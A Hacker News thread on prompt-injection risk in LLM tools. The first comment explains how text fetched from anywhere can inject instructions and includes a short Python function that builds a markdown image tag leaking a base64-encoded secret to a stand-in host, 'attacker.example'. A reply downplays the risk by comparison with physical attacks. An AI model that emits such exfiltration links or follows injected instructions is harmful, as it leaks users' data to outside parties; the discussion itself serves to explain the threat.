Hacker News

Terr_ today at 3:58 AM

Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.

Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.

Once that happens, exfiltration can be as simple as generating a spreadsheet/doc containing a link or a small auto-loaded image, with a URL that has the data base64'd into it.
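A minimal sketch of that exfiltration channel (the attacker host, function name, and "secret" string here are all hypothetical): the injected instructions just have to get the model to emit markdown with an image whose URL carries base64'd data, and whatever renders the doc auto-fetches it.

```python
import base64

def exfil_image_markdown(secret: str, attacker_host: str = "attacker.example") -> str:
    """Build a markdown image tag that smuggles `secret` out via the image URL."""
    # URL-safe base64 so the payload survives as a query-string value.
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    # When the generated doc is rendered, loading this "image" fires a GET
    # request that delivers the payload to the attacker's server logs.
    return f"![chart](https://{attacker_host}/pixel.png?d={payload})"

print(exfil_image_markdown("api_key=sk-12345"))
```

No user click is required if the renderer fetches images automatically, which is why some chat UIs now block or proxy external image loads.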


Replies

scottyah today at 4:18 AM

Or you could just get a hooker to sleep with one of them and plug a USB drive into their work laptop. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger an attack surface than already exists?

The work BigIP is doing on LLM traffic analysis is cool though.
